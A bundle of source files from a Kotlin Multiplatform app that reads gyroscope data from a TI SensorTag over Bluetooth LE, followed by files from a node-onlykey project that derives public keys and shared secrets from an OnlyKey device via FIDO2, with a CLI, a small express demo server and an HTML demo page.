private const val MOVEMENT_SENSOR_SERVICE_UUID = "F000AA80-0451-4000-B000-000000000000"
private val movementConfigCharacteristic = characteristicOf(
service = MOVEMENT_SENSOR_SERVICE_UUID,
characteristic = "F000AA82-0451-4000-B000-000000000000",
)
private val movementDataCharacteristic = characteristicOf(
service = MOVEMENT_SENSOR_SERVICE_UUID,
characteristic = "F000AA81-0451-4000-B000-000000000000",
)
private val movementPeriodCharacteristic = characteristicOf(
service = MOVEMENT_SENSOR_SERVICE_UUID,
characteristic = "F000AA83-0451-4000-B000-000000000000",
)
data class Vector3f(val x: Float, val y: Float, val z: Float)
private const val GYRO_MULTIPLIER = 500f / 65536f
class SensorTag(
private val peripheral: Peripheral
) : Peripheral by peripheral {
val gyro: Flow<Vector3f> = peripheral.observe(movementDataCharacteristic)
.map { data ->
Vector3f(
x = data.x * GYRO_MULTIPLIER,
y = data.y * GYRO_MULTIPLIER,
z = data.z * GYRO_MULTIPLIER,
)
}
/** Set period, allowable range is 100-2550 ms. */
suspend fun writeGyroPeriod(periodMillis: Long) {
val value = periodMillis / 10
val data = byteArrayOf(value.toByte())
Log.info { "movement → writePeriod → data = $value (${data.toHexString()})" }
peripheral.write(movementPeriodCharacteristic, data)
Log.info { "writeGyroPeriod complete" }
}
/** Period (in milliseconds) within the range 100-2550 ms. */
suspend fun readGyroPeriod(): Int {
val value = peripheral.read(movementPeriodCharacteristic)
Log.info { "movement → readPeriod → value = ${value.toHexString()}" }
return value[0] * 10
}
suspend fun enableGyro() {
Log.info { "Enabling gyro" }
peripheral.write(movementConfigCharacteristic, byteArrayOf(0x7F, 0x0))
Log.info { "Gyro enabled" }
}
suspend fun disableGyro() {
peripheral.write(movementConfigCharacteristic, byteArrayOf(0x0, 0x0))
}
}
private inline val ByteArray.x: Short get() = readShort(0)
private inline val ByteArray.y: Short get() = readShort(2)
private inline val ByteArray.z: Short get() = readShort(4)
private inline infix fun Byte.and(other: Int): Int = toInt() and other
private inline fun ByteArray.readShort(offset: Int): Short {
val value = get(offset) and 0xff or (get(offset + 1) and 0xff shl 8)
return value.toShort()
}
<|start_filename|>app/src/androidMain/kotlin/features/sensor/SensorViewModel.kt<|end_filename|>
package com.juul.sensortag.features.sensor
import android.app.Application
import android.bluetooth.BluetoothAdapter
import androidx.lifecycle.AndroidViewModel
import androidx.lifecycle.viewModelScope
import com.juul.kable.ConnectionLostException
import com.juul.kable.NotReadyException
import com.juul.kable.Peripheral
import com.juul.kable.State
import com.juul.kable.peripheral
import com.juul.sensortag.SensorTag
import com.juul.sensortag.Vector3f
import com.juul.sensortag.features.sensor.ViewState.Connected.GyroState
import com.juul.sensortag.features.sensor.ViewState.Connected.GyroState.AxisState
import com.juul.tuulbox.logging.Log
import kotlinx.coroutines.CoroutineScope
import kotlinx.coroutines.GlobalScope
import kotlinx.coroutines.delay
import kotlinx.coroutines.flow.Flow
import kotlinx.coroutines.flow.catch
import kotlinx.coroutines.flow.combine
import kotlinx.coroutines.flow.filter
import kotlinx.coroutines.flow.flatMapLatest
import kotlinx.coroutines.flow.flow
import kotlinx.coroutines.flow.flowOf
import kotlinx.coroutines.flow.launchIn
import kotlinx.coroutines.flow.onEach
import kotlinx.coroutines.launch
import kotlinx.coroutines.withTimeoutOrNull
import java.util.concurrent.TimeUnit
import java.util.concurrent.atomic.AtomicInteger
import kotlin.math.absoluteValue
import kotlin.math.pow
import kotlin.math.roundToInt
private val DISCONNECT_TIMEOUT = TimeUnit.SECONDS.toMillis(5)
sealed class ViewState {
object Connecting : ViewState()
data class Connected(
val rssi: Int,
val gyro: GyroState
) : ViewState() {
data class GyroState(
val x: AxisState,
val y: AxisState,
val z: AxisState
) {
data class AxisState(
val label: CharSequence,
val progress: Int
)
}
}
object Disconnecting : ViewState()
object Disconnected : ViewState()
}
val ViewState.label: CharSequence
get() = when (this) {
ViewState.Connecting -> "Connecting"
is ViewState.Connected -> "Connected"
ViewState.Disconnecting -> "Disconnecting"
ViewState.Disconnected -> "Disconnected"
}
class SensorViewModel(
application: Application,
macAddress: String
) : AndroidViewModel(application) {
private val peripheral = viewModelScope.peripheral(bluetoothDeviceFrom(macAddress))
private val sensorTag = SensorTag(peripheral)
private val connectionAttempt = AtomicInteger()
private val periodProgress = AtomicInteger()
init {
viewModelScope.enableAutoReconnect()
viewModelScope.connect()
}
private fun CoroutineScope.enableAutoReconnect() {
peripheral.state
.filter { it is State.Disconnected }
.onEach {
val timeMillis =
backoff(base = 500L, multiplier = 2f, retry = connectionAttempt.getAndIncrement())
Log.info { "Waiting $timeMillis ms to reconnect..." }
delay(timeMillis)
connect()
}
.launchIn(this)
}
private fun CoroutineScope.connect() {
connectionAttempt.incrementAndGet()
launch {
Log.debug { "connect" }
try {
peripheral.connect()
sensorTag.enableGyro()
sensorTag.writeGyroPeriodProgress(periodProgress.get())
connectionAttempt.set(0)
} catch (e: ConnectionLostException) {
Log.warn(e) { "Connection attempt failed" }
}
}
}
val viewState: Flow<ViewState> = peripheral.state.flatMapLatest { state ->
when (state) {
is State.Connecting -> flowOf(ViewState.Connecting)
State.Connected -> combine(peripheral.remoteRssi(), sensorTag.gyro) { rssi, gyro ->
ViewState.Connected(rssi, gyroState(gyro))
}
State.Disconnecting -> flowOf(ViewState.Disconnecting)
is State.Disconnected -> flowOf(ViewState.Disconnected)
}
}
private val max = Max()
private fun gyroState(gyro: Vector3f): GyroState {
val (progressX, progressY, progressZ) = gyro.progress(max.maxOf(gyro))
return GyroState(
x = AxisState(label = "X: ${gyro.x} ˚/sec", progress = progressX),
y = AxisState(label = "Y: ${gyro.y} ˚/sec", progress = progressY),
z = AxisState(label = "Z: ${gyro.z} ˚/sec", progress = progressZ)
)
}
fun setPeriod(progress: Int) {
periodProgress.set(progress)
viewModelScope.launch {
sensorTag.writeGyroPeriodProgress(progress)
}
}
override fun onCleared() {
GlobalScope.launch {
withTimeoutOrNull(DISCONNECT_TIMEOUT) {
peripheral.disconnect()
}
}
}
}
private fun bluetoothDeviceFrom(macAddress: String) =
BluetoothAdapter.getDefaultAdapter().getRemoteDevice(macAddress)
private fun Peripheral.remoteRssi() = flow {
while (true) {
val rssi = rssi()
Log.debug { "RSSI: $rssi" }
emit(rssi)
delay(1_000L)
}
}.catch { cause ->
// todo: Investigate better way of handling this failure case.
// When disconnecting, we may attempt to read `rssi` causing a `NotReadyException` but the hope is that `remoteRssi`
// Flow would already be cancelled by the time the `Peripheral` is "not ready" (doesn't seem to be the case).
if (cause !is NotReadyException) throw cause
}
private suspend fun SensorTag.writeGyroPeriodProgress(progress: Int) {
val period = progress / 100f * (2550 - 100) + 100
Log.verbose { "period = $period" }
writeGyroPeriod(period.toLong())
}
private fun Vector3f.progress(max: Max) = Triple(
((if (max.x != 0f) x.absoluteValue / max.x else 0f) * 100).roundToInt(),
((if (max.y != 0f) y.absoluteValue / max.y else 0f) * 100).roundToInt(),
((if (max.z != 0f) z.absoluteValue / max.z else 0f) * 100).roundToInt()
)
private data class Max(
var x: Float = 0f,
var y: Float = 0f,
var z: Float = 0f
) {
fun maxOf(vector: Vector3f) = apply {
x = maxOf(x, vector.x.absoluteValue)
y = maxOf(y, vector.y.absoluteValue)
z = maxOf(z, vector.z.absoluteValue)
}
}
/**
* Exponential backoff using the following formula:
*
* ```
* delay = base * multiplier ^ retry
* ```
*
* For example (using `base = 100` and `multiplier = 2`):
*
* | retry | delay |
* |-------|-------|
* | 1 | 100 |
* | 2 | 200 |
* | 3 | 400 |
* | 4 | 800 |
* | 5 | 1600 |
* | ... | ... |
*
* Inspired by:
* [Exponential Backoff And Jitter](https://aws.amazon.com/blogs/architecture/exponential-backoff-and-jitter/)
*
* @return Backoff delay (in units matching [base] units, e.g. if [base] units are milliseconds then returned delay will be milliseconds).
*/
private fun backoff(
base: Long,
multiplier: Float,
retry: Int,
): Long = (base * multiplier.pow(retry - 1)).toLong()
<|start_filename|>app/src/androidMain/kotlin/features/scan/ScanActivity.kt<|end_filename|>
package com.juul.sensortag.features.scan
import android.Manifest.permission.ACCESS_COARSE_LOCATION
import android.Manifest.permission.ACCESS_FINE_LOCATION
import android.app.Activity
import android.bluetooth.BluetoothAdapter
import android.bluetooth.BluetoothAdapter.ACTION_REQUEST_ENABLE
import android.content.Context
import android.content.Intent
import android.content.pm.PackageManager.PERMISSION_GRANTED
import android.os.Build
import android.os.Bundle
import android.view.Menu
import android.view.MenuItem
import android.view.View
import androidx.activity.viewModels
import androidx.appcompat.app.AlertDialog
import androidx.appcompat.app.AppCompatActivity
import androidx.core.app.ActivityCompat
import androidx.core.content.ContextCompat
import androidx.lifecycle.asLiveData
import androidx.recyclerview.widget.LinearLayoutManager
import com.google.android.material.snackbar.Snackbar
import com.juul.kable.Advertisement
import com.juul.sensortag.R
import com.juul.sensortag.databinding.ScanBinding
import com.juul.sensortag.features.scan.ScanStatus.Failed
import com.juul.sensortag.features.scan.ScanStatus.Started
import com.juul.sensortag.features.scan.ScanStatus.Stopped
import com.juul.sensortag.features.sensor.SensorActivityIntent
import com.juul.sensortag.observe
import com.juul.tuulbox.logging.Log
class ScanActivity : AppCompatActivity() {
private val viewModel by viewModels<ScanViewModel>()
private lateinit var adapter: ScanAdapter
private var snackbar: Snackbar? = null
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
val listener = { advertisement: Advertisement ->
viewModel.stopScan()
val intent = SensorActivityIntent(
context = this@ScanActivity,
macAddress = advertisement.address
)
startActivity(intent)
}
adapter = ScanAdapter(listener).apply {
setHasStableIds(true)
}
observe(viewModel.advertisements.asLiveData()) {
adapter.update(it)
}
observe(viewModel.scanStatus.asLiveData()) { status ->
Log.debug { "Scan status: $status" }
when (status) {
Started -> showSnackbar("Scanning")
Stopped -> dismissSnackbar()
is Failed -> {
dismissSnackbar()
showAlert("Scan failed!\n${status.message}")
}
}
}
ScanBinding.inflate(layoutInflater).apply {
scanList.layoutManager = LinearLayoutManager(this@ScanActivity)
scanList.adapter = adapter
setContentView(root)
}
}
override fun onCreateOptionsMenu(menu: Menu): Boolean {
menuInflater.inflate(R.menu.scan, menu)
return true
}
override fun onOptionsItemSelected(
item: MenuItem,
): Boolean {
when (item.itemId) {
R.id.refresh -> scan()
R.id.clear -> {
viewModel.stopScan()
adapter.update(emptyList())
}
else -> return super.onOptionsItemSelected(item)
}
return true
}
private fun scan() {
when {
!isBluetoothEnabled -> enableBluetooth()
!hasLocationPermission -> requestLocationPermission()
else -> viewModel.startScan()
}
}
private data class SnackbarAction(
val text: CharSequence,
val action: View.OnClickListener,
)
private fun showSnackbar(
text: CharSequence,
action: SnackbarAction? = null,
) {
snackbar = Snackbar
.make(findViewById(R.id.scan_list), text, Snackbar.LENGTH_INDEFINITE)
.apply {
if (action != null) setAction(action.text, action.action)
show()
}
}
private fun dismissSnackbar() {
snackbar?.dismiss()
snackbar = null
}
override fun onPause() {
super.onPause()
viewModel.stopScan()
}
}
private fun Context.showAlert(message: CharSequence) {
AlertDialog.Builder(this)
.setMessage(message)
.show()
}
private val isBluetoothEnabled: Boolean
get() = BluetoothAdapter.getDefaultAdapter().isEnabled
private fun Activity.enableBluetooth() {
val intent = Intent(ACTION_REQUEST_ENABLE)
startActivityForResult(intent, RequestCode.EnableBluetooth)
}
private object RequestCode {
const val EnableBluetooth = 55001
const val LocationPermission = 55002
}
private val Context.hasLocationPermission: Boolean
get() = Build.VERSION.SDK_INT < Build.VERSION_CODES.M ||
hasPermission(ACCESS_COARSE_LOCATION) ||
hasPermission(ACCESS_FINE_LOCATION)
private fun Context.hasPermission(
permission: String,
): Boolean = ContextCompat.checkSelfPermission(this, permission) == PERMISSION_GRANTED
/**
* Shows the native Android permission request dialog.
*
* The result of the dialog will come back via [Activity.onRequestPermissionsResult] method.
*/
private fun Activity.requestLocationPermission() {
/* .-----------------------------.
* | _ |
* | /o\ Allow App to access |
* | \ / access this device's |
* | v location? |
* | |
* | [ ] Don't ask again |
* | |
* | DENY ALLOW |
* '-----------------------------'
*
* "Don't ask again" checkbox is not shown on the first request, but on all subsequent requests (after a DENY).
*/
val permissions = arrayOf(ACCESS_FINE_LOCATION)
ActivityCompat.requestPermissions(this, permissions, RequestCode.LocationPermission)
}
<|start_filename|>app/src/androidMain/kotlin/features/sensor/SensorActivity.kt<|end_filename|>
package com.juul.sensortag.features.sensor
import android.os.Bundle
import androidx.activity.viewModels
import androidx.appcompat.app.AppCompatActivity
import androidx.lifecycle.ViewModel
import androidx.lifecycle.ViewModelProvider
import androidx.lifecycle.asLiveData
import com.juul.exercise.annotations.Exercise
import com.juul.exercise.annotations.Extra
import com.juul.sensortag.databinding.SensorBinding
import com.juul.sensortag.features.sensor.ViewState.Connected
import com.juul.sensortag.observe
import com.juul.sensortag.onStopTracking
@Exercise(Extra("macAddress", String::class))
class SensorActivity : AppCompatActivity() {
private val viewModel by viewModels<SensorViewModel> {
object : ViewModelProvider.Factory {
override fun <T : ViewModel> create(
modelClass: Class<T>
): T = SensorViewModel(application, extras.macAddress) as T
}
}
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
SensorBinding.inflate(layoutInflater).apply {
period.onStopTracking { viewModel.setPeriod(progress) }
observe(viewModel.viewState.asLiveData()) { viewState ->
period.isEnabled = viewState is Connected
if (viewState is Connected) {
status.text = "${viewState.label} (${viewState.rssi} dBm)"
with(viewState.gyro) {
xAxisLabel.text = x.label
yAxisLabel.text = y.label
zAxisLabel.text = z.label
xAxisBar.progress = x.progress
yAxisBar.progress = y.progress
zAxisBar.progress = z.progress
}
} else {
status.text = viewState.label
xAxisLabel.text = null
yAxisLabel.text = null
zAxisLabel.text = null
xAxisBar.progress = 0
yAxisBar.progress = 0
zAxisBar.progress = 0
}
}
setContentView(root)
}
}
}
<|start_filename|>app/build.gradle.kts<|end_filename|>
plugins {
id("com.android.application")
kotlin("multiplatform")
id("com.google.devtools.ksp")
}
kotlin {
android()
js().browser()
macosX64 {
binaries {
executable {
baseName = "sensortag"
entryPoint = "com.juul.sensortag.main"
}
}
}
sourceSets {
val commonMain by getting {
dependencies {
api(libs.coroutines.core)
implementation(libs.kable)
implementation(libs.tuulbox.logging)
implementation(libs.tuulbox.encoding)
}
}
val androidMain by getting {
dependencies {
implementation(libs.material)
implementation(libs.bundles.androidx)
implementation(libs.exercise.annotations)
}
}
val nativeMain by creating {
dependencies {
implementation(libs.coroutines.macosx64)
implementation(libs.stately)
}
}
val macosX64Main by getting {
dependsOn(nativeMain)
}
}
}
android {
compileSdkVersion(libs.versions.android.compile.get())
defaultConfig {
minSdkVersion(libs.versions.android.min.get())
}
buildFeatures {
viewBinding = true
}
lintOptions {
isAbortOnError = false
}
sourceSets {
val main by getting {
manifest.srcFile("src/androidMain/AndroidManifest.xml")
}
}
}
dependencies {
ksp(libs.exercise.compile)
}
// Fix failure when building JavaScript target (with Webpack 5).
// https://youtrack.jetbrains.com/issue/KT-48273
// todo: Remove once Kotlin is upgraded to 1.5.30.
afterEvaluate {
rootProject.extensions.configure<org.jetbrains.kotlin.gradle.targets.js.nodejs.NodeJsRootExtension> {
versions.webpackDevServer.version = "4.0.0"
}
}
<|start_filename|>app/src/androidMain/kotlin/features/scan/ScanViewModel.kt<|end_filename|>
package com.juul.sensortag.features.scan
import android.app.Application
import androidx.lifecycle.AndroidViewModel
import androidx.lifecycle.viewModelScope
import com.juul.kable.Advertisement
import com.juul.kable.Scanner
import com.juul.sensortag.features.scan.ScanStatus.Failed
import com.juul.sensortag.features.scan.ScanStatus.Started
import com.juul.sensortag.features.scan.ScanStatus.Stopped
import kotlinx.coroutines.CancellationException
import kotlinx.coroutines.CoroutineScope
import kotlinx.coroutines.Job
import kotlinx.coroutines.cancelChildren
import kotlinx.coroutines.flow.MutableStateFlow
import kotlinx.coroutines.flow.asStateFlow
import kotlinx.coroutines.flow.catch
import kotlinx.coroutines.flow.collect
import kotlinx.coroutines.flow.filter
import kotlinx.coroutines.flow.onCompletion
import kotlinx.coroutines.launch
import kotlinx.coroutines.withTimeoutOrNull
import java.util.concurrent.TimeUnit
private val SCAN_DURATION_MILLIS = TimeUnit.SECONDS.toMillis(10)
sealed class ScanStatus {
object Stopped : ScanStatus()
object Started : ScanStatus()
data class Failed(val message: CharSequence) : ScanStatus()
}
class ScanViewModel(application: Application) : AndroidViewModel(application) {
private val scanner = Scanner()
private val scanScope = viewModelScope.childScope()
private val found = hashMapOf<String, Advertisement>()
private val _scanStatus = MutableStateFlow<ScanStatus>(Stopped)
val scanStatus = _scanStatus.asStateFlow()
private val _advertisements = MutableStateFlow<List<Advertisement>>(emptyList())
val advertisements = _advertisements.asStateFlow()
fun startScan() {
if (_scanStatus.value == Started) return // Scan already in progress.
_scanStatus.value = Started
scanScope.launch {
withTimeoutOrNull(SCAN_DURATION_MILLIS) {
scanner
.advertisements
.catch { cause -> _scanStatus.value = Failed(cause.message ?: "Unknown error") }
.onCompletion { cause -> if (cause == null) _scanStatus.value = Stopped }
.filter { it.isSensorTag }
.collect { advertisement ->
found[advertisement.address] = advertisement
_advertisements.value = found.values.toList()
}
}
}
}
fun stopScan() {
scanScope.cancelChildren()
}
}
private val Advertisement.isSensorTag
get() = name?.startsWith("SensorTag") == true ||
name?.startsWith("CC2650 SensorTag") == true
private fun CoroutineScope.childScope() =
CoroutineScope(coroutineContext + Job(coroutineContext[Job]))
private fun CoroutineScope.cancelChildren(
cause: CancellationException? = null
) = coroutineContext[Job]?.cancelChildren(cause)
<|start_filename|>app/src/androidMain/kotlin/SeekBar.kt<|end_filename|>
package com.juul.sensortag
import android.widget.SeekBar
fun SeekBar.onStopTracking(action: SeekBar.() -> Unit) {
val listener = object : SeekBar.OnSeekBarChangeListener {
override fun onStartTrackingTouch(seekBar: SeekBar) {}
override fun onProgressChanged(seekBar: SeekBar, progress: Int, fromUser: Boolean) {}
override fun onStopTrackingTouch(seekBar: SeekBar) {
action.invoke(seekBar)
}
}
setOnSeekBarChangeListener(listener)
}
<|start_filename|>app/src/jsMain/kotlin/Script.kt<|end_filename|>
package com.juul.sensortag
import com.juul.kable.Options
import com.juul.kable.Options.Filter.NamePrefix
import com.juul.kable.State.Disconnected
import com.juul.kable.requestPeripheral
import com.juul.tuulbox.logging.ConsoleLogger
import com.juul.tuulbox.logging.ConstantTagGenerator
import com.juul.tuulbox.logging.Log
import kotlinx.coroutines.CoroutineScope
import kotlinx.coroutines.Job
import kotlinx.coroutines.await
import kotlinx.coroutines.coroutineScope
import kotlinx.coroutines.delay
import kotlinx.coroutines.flow.collect
import kotlinx.coroutines.flow.launchIn
import kotlinx.coroutines.flow.onEach
import kotlinx.coroutines.launch
typealias MessageListener = (message: String) -> Unit
typealias MovementListener = (x: Float, y: Float, z: Float) -> Unit
private fun canonicalUuid(uuid: String): String = when (uuid.length) {
4 -> "0000$uuid-0000-1000-8000-00805f9b34fb"
else -> error("Canonical UUID length must be 4, was ${uuid.length}")
}
private const val movementSensorServiceUuid = "f000aa80-0451-4000-b000-000000000000"
private const val movementSensorDataUuid = "f000aa81-0451-4000-b000-000000000000"
private const val movementNotificationUuid = "f0002902-0451-4000-b000-000000000000"
private const val movementConfigurationUuid = "f000aa82-0451-4000-b000-000000000000"
private const val movementPeriodUuid = "f000aa83-0451-4000-b000-000000000000"
private val clientCharacteristicConfigUuid = canonicalUuid("2902")
class Script {
init {
Log.tagGenerator = ConstantTagGenerator(tag = "SensorTag")
Log.dispatcher.install(ConsoleLogger)
}
private val scope = CoroutineScope(Job())
private val options = Options(
optionalServices = arrayOf(
movementSensorServiceUuid,
movementSensorDataUuid,
movementNotificationUuid,
movementConfigurationUuid,
movementPeriodUuid,
clientCharacteristicConfigUuid,
),
filters = arrayOf(
NamePrefix("SensorTag"),
NamePrefix("CC2650 SensorTag"),
)
)
private val statusListeners = mutableListOf<MessageListener>()
@JsName("addStatusListener")
fun addStatusListener(listener: MessageListener) {
statusListeners += listener
}
@JsName("removeStatusListener")
fun removeStatusListener(listener: MessageListener) {
statusListeners -= listener
}
private fun emitStatus(status: String) {
Log.verbose { status }
statusListeners.forEach { it.invoke(status) }
}
private val movementListeners = mutableListOf<MovementListener>()
@JsName("addMovementListener")
fun addMovementListener(listener: MovementListener) {
movementListeners += listener
}
@JsName("removeMovementListener")
fun removeMovementListener(listener: MovementListener) {
movementListeners -= listener
}
private fun emitMovement(movement: Vector3f) {
val (x, y, z) = movement
movementListeners.forEach { it.invoke(x, y, z) }
}
private var connection: Job? = null
@JsName("connect")
fun connect(): Unit {
disconnect() // Clean up previous connection, if any.
connection = scope.launch {
val sensorTag = SensorTag(requestPeripheral(options).await())
sensorTag.establishConnection()
enableAutoReconnect(sensorTag)
try {
sensorTag.gyro.collect(::emitMovement)
} finally {
sensorTag.disconnect()
}
}.apply {
invokeOnCompletion { cause ->
Log.info { "invokeOnCompletion $cause" }
emitStatus("Disconnected")
}
}
}
@JsName("disconnect")
fun disconnect() {
connection?.cancel()
connection = null
}
private suspend fun SensorTag.establishConnection(): Unit = coroutineScope {
emitStatus("Connecting")
connect()
enableGyro()
emitStatus("Connected")
}
private fun CoroutineScope.enableAutoReconnect(
sensorTag: SensorTag
) = sensorTag.state.onEach { state ->
Log.info { "State: ${state::class.simpleName}" }
if (state is Disconnected) {
Log.info { "Waiting 5 seconds to reconnect..." }
delay(5_000L)
sensorTag.establishConnection()
}
}.launchIn(this)
}
<|start_filename|>app/src/androidMain/kotlin/App.kt<|end_filename|>
package com.juul.sensortag
import android.app.Application
import com.juul.tuulbox.logging.ConsoleLogger
import com.juul.tuulbox.logging.Log
class App : Application() {
override fun onCreate() {
super.onCreate()
Log.dispatcher.install(ConsoleLogger)
}
}
<|start_filename|>app/src/androidMain/kotlin/features/scan/ScanAdapter.kt<|end_filename|>
package com.juul.sensortag.features.scan
import android.view.LayoutInflater
import android.view.ViewGroup
import androidx.recyclerview.widget.DiffUtil
import androidx.recyclerview.widget.RecyclerView
import com.juul.sensortag.databinding.ScanItemBinding
import com.juul.kable.Advertisement
import java.lang.Long.parseLong
class ScanAdapter(
private val listener: (Advertisement) -> Unit
) : RecyclerView.Adapter<ScanItemViewBinder>() {
private val advertisements = mutableListOf<Advertisement>()
fun update(newList: List<Advertisement>) {
if (newList.isEmpty()) {
advertisements.clear()
notifyDataSetChanged()
} else {
val result = DiffUtil.calculateDiff(DiffCallback(advertisements, newList), false)
advertisements.clear()
advertisements.addAll(newList)
result.dispatchUpdatesTo(this)
}
}
override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): ScanItemViewBinder {
val binding = ScanItemBinding.inflate(LayoutInflater.from(parent.context), parent, false)
return ScanItemViewBinder(binding)
}
override fun onBindViewHolder(binder: ScanItemViewBinder, position: Int) =
binder.bind(advertisements[position], listener)
override fun getItemCount(): Int = advertisements.size
override fun getItemId(position: Int): Long = advertisements[position].id
}
class ScanItemViewBinder(
private val binding: ScanItemBinding
) : RecyclerView.ViewHolder(binding.root) {
fun bind(
advertisement: Advertisement,
listener: (Advertisement) -> Unit
) = with(binding) {
deviceName.text = advertisement.name ?: "<unknown>"
macAddress.text = advertisement.address
rssi.text = "${advertisement.rssi} dBm"
root.setOnClickListener { listener.invoke(advertisement) }
}
}
private val Advertisement.id: Long
get() {
require(address.isNotBlank())
return parseLong(address.replace(":", ""), 16)
}
<|start_filename|>build.gradle.kts<|end_filename|>
buildscript {
repositories {
google()
mavenCentral()
}
}
plugins {
alias(libs.plugins.kotlin.multiplatform) apply false
alias(libs.plugins.ksp) apply false
alias(libs.plugins.android.application) apply false
alias(libs.plugins.java8)
}
subprojects {
repositories {
mavenLocal()
google()
mavenCentral()
maven("https://oss.sonatype.org/content/repositories/snapshots")
}
}
| JuulLabs/sensortag |
<|start_filename|>docs/nodejs/index.js<|end_filename|>
var { FIDO2Client } = require("@vincss-public-projects/fido2-client");
var fido2 = new FIDO2Client();
// fido2.on("fido2-enter-pin", function(a,b,c){
// console.log("set pin");
// // fido2.emit("fido2-enter-pin-replay","0420");
// fido2.reply("0420");
// });
var EventEmitter = require("events").EventEmitter;
var $window = new EventEmitter();
// $window.crypto = require("node-webcrypto-shim");
const WebCrypto = require('node-webcrypto-ossl');
const webcrypto = new WebCrypto({
// directory: `${process.env.HOME}/.webcrypto/keys`
});
$window.crypto = webcrypto;
$window.atob = require("atob");
$window.btoa = require("btoa");
$window.location = {
hostname: "grid.peersocial.io" //set to your domain
};
$window.navigator = {
vendor: "NODE",
userAgent: "NODE",
platform: "Linux",
credentials: {
get: function(ticket) {
return fido2.getAssertion(ticket, "https://" + $window.location.hostname)
}
}
};
global.window = $window;
var ONLYKEY = require("../../src/onlykey-api.js");
console.log(ONLYKEY)
var bob = {"pub":"<KEY>","priv":"<KEY>","epub":"<KEY>","epriv":"<KEY>"};
var press_required = false;
ONLYKEY.connect(async function() {
var keyType = 1; //P256R1
ONLYKEY.derive_public_key("Onlykey Rocks!", keyType, press_required, async function(err, key) {
ONLYKEY.derive_shared_secret("Onlykey Rocks!", bob.epub, keyType, press_required, async function(err, sharedSecret) {
console.log("key:", key)
console.log("sharedSecret:", sharedSecret)
});
});
});
<|start_filename|>src/cli.js<|end_filename|>
#!/usr/bin/env node
// module.exports = function(callback) {
var args = require('minimist')(process.argv.slice(2), {
// '--': true,
boolean: [
"keypress",
// "serial",
"help"
],
alias: {
keytype: "t",
keypress: "p",
help: ["h","?"]
},
default: {
seed:"Onlykey Rocks!",
keytype: 1,
keypress: false,
domnain:'localhost',
// serial: false,
help: false
}
});
if(args.help){
console.log("--help,-h,-? shows this");
// console.log("--serial developer firmware serial");
console.log("--keypress,-p use touch key");
console.log("--keytype=1,-t=1 1=P256R1,3=CURVE25519");
console.log("--seed='Onlykey Rocks!' seed for aditional_data");
console.log("--secret='pubkey' pubkey to generate a secret from seed");
console.log("--domain='localhost' domain to generate keys for");
return;
}
// if (args.serial) {
// require("./serial.js");
// return;
// }
if(!process.env.DOMAIN && args.domain)
process.env.DOMAIN = args.domain;
var plugins = [];
plugins.push(require("./window.js")); //load replacement onlykey need for plugin
plugins.push(require("./onlykey-fido2/plugin.js")); //load onlykey plugin for testing
plugins.push(require("./console/console.js")); //load replacement onlykey need for plugin
var EventEmitter = require("events").EventEmitter;
var architect = require("../libs/architect.js");
plugins.push({
provides: ["app"],
consumes: ["hub"],
setup: function(options, imports, register) {
register(null, {
app: new EventEmitter()
});
}
});
architect.createApp(plugins, function(err, app) {
if (err) return console.error(err);
app.services.app.core = app.services;
for (var i in app.services) {
app.services.app[i] = app.services[i];
}
for (var i in app.services) {
if (app.services[i].init) app.services[i].init(app);
}
// app.services.app.emit("start");
// callback(null, app);
var ONLYKEY = app.services.onlykey3rd(args.keytype);
// ONLYKEY.connect(console.log)
if (!args.secret) {
ONLYKEY.derive_public_key(args.seed, args.keytype, args.keypress, async function(err, key) {
console.log(JSON.stringify({domain: process.env.DOMAIN, seed: args.seed, epub:key }))
});
}
else {
ONLYKEY.derive_shared_secret(args.seed, args.secret, args.keytype, args.keypress, async function(err, sharedSecret, seedKey) {
console.log(JSON.stringify({domain: process.env.DOMAIN, seed: args.seed, epub:seedKey, pub: args.secret, sharedSecret: sharedSecret }))
});
}
});
// }
<|start_filename|>docs/server.js<|end_filename|>
var express = require("express");
var app = express();
var http = require('http');
var https = require('https');
var fs = require('fs');
var server;
if(!process.env.PORT){
process.env.PORT = 3000;
var cert;
try{
server = https.createServer({
key: fs.readFileSync('_._server.key'),
cert: cert = fs.readFileSync('_._server.cert')
}, app);
}catch(e){}
if(!cert){
console.log("need to run this command in terminal in project dir", __dirname);
console.log("' $ openssl req -nodes -new -x509 -keyout _._server.key -out _._server.cert '");
server = http.createServer(app);
}
}else{
server = http.createServer(app);
}
app.use("/dist", express.static(__dirname + "/../dist"));
app.use(express.static(__dirname));
// app.use("/libs", express.static(__dirname + "/../libs"));
process.env.PORT = process.env.PORT || 3000;
server.listen(process.env.PORT, () => {
console.log('listening on *:' + process.env.PORT);
});
<|start_filename|>docs/index.html<|end_filename|>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>node-onlykey demonstration</title>
<link href="./libs/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<style>
body {
padding-top: 5rem;
}
</style>
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark bg-dark fixed-top">
<a class="navbar-brand" href="./">node-onlykey demonstration</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="navbar-collapse collapse justify-content-between" id="navbarNavDropdown">
<ul class="navbar-nav mr-auto" id="navbar-nav-left">
</ul>
<ul class="navbar-nav" id="navbar-nav-right">
</ul>
</div>
</nav>
<main role="main" class="container-fluid" id="main-container">
<h2>Welcome to Onlykey's 3rd Party demonstration.</h2><hr/>
Here we show you how to encrypt and decrypt using shared keys.<br/>
For shared key cryptography to work, the sender and the recipient of a message must both have the same key, which they must keep secret from everybody else.<br/>
The sender uses the shared key to encrypt a message, and then sends the ciphertext message to the recipient.<br/>
When the ciphertext message arrives, the recipient uses the identical shared key to decrypt the message.
<br/>
<hr/>
With Onlykey, We offer 2 types of Key Types(P256R1 and CURVE25519) that can generate shared secret keys. First by generating a Unique Public Key that is sent to sender and a Unique Public Key received from the recipient.<br/>
It's important to understand that all keys generated with Onlykey are unique per Domain in combination with Additional Data.<br/>
Additional Data Changes the Public and Private Keys to allow a unlimited amount of keys to generate shared secrets per domain.<br/>
Generating keys with identical Additional Data on a different domain will result in a different key.
<hr/>
In addition to Generating keys. There is a optional physical human press interaction. Securing rogue access to shared keys.<br/>
